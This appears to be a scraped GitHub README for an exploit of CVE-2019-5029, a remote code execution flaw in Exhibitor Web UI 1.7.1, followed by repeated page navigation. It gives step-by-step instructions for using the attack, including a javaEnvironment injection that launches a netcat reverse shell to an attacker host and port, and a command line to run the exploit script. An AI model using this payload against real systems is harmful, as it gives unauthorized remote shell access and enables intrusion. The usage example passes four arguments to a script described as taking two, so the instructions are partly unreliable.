Exhibitor-RCE

Exhibitor Web Ui 1.7.1 RCE, CVE-2019-5029

Step 1:

$ git clone https://github.com/thehunt1s0n/Exihibitor-RCE/

Step 2:

$ cd Exihibitor-RCE/

Step 3 (optional):

You might need to edit json data payload in the script. To do that simply capture the request using burpsuite when comiting the changes in the config tab of exihibitor and copy pasting into the curl command in the script.

Make sure to change the javaEnvironment with the following:

"javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)"

Step 4:

./exploit.sh <attacker_host> <attacker_port>

Example:

$ ./exploit.sh 192.168.197.98 8080 192.168.45.187 8080

Name		Name	Last commit message	Last commit date
Latest commit History 7 Commits
media		media
README.md		README.md
exploit.sh		exploit.sh

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

media

media

README.md

README.md

exploit.sh

exploit.sh

Repository files navigation

Exhibitor-RCE

Step 1:

Step 2:

Step 3 (optional):

Step 4:

About

Releases

Packages

Languages

thehunt1s0n/Exihibitor-RCE

Folders and files

Latest commit

History

Repository files navigation

Exhibitor-RCE

Step 1:

Step 2:

Step 3 (optional):

Step 4:

About

Resources

Stars

Watchers

Forks

Languages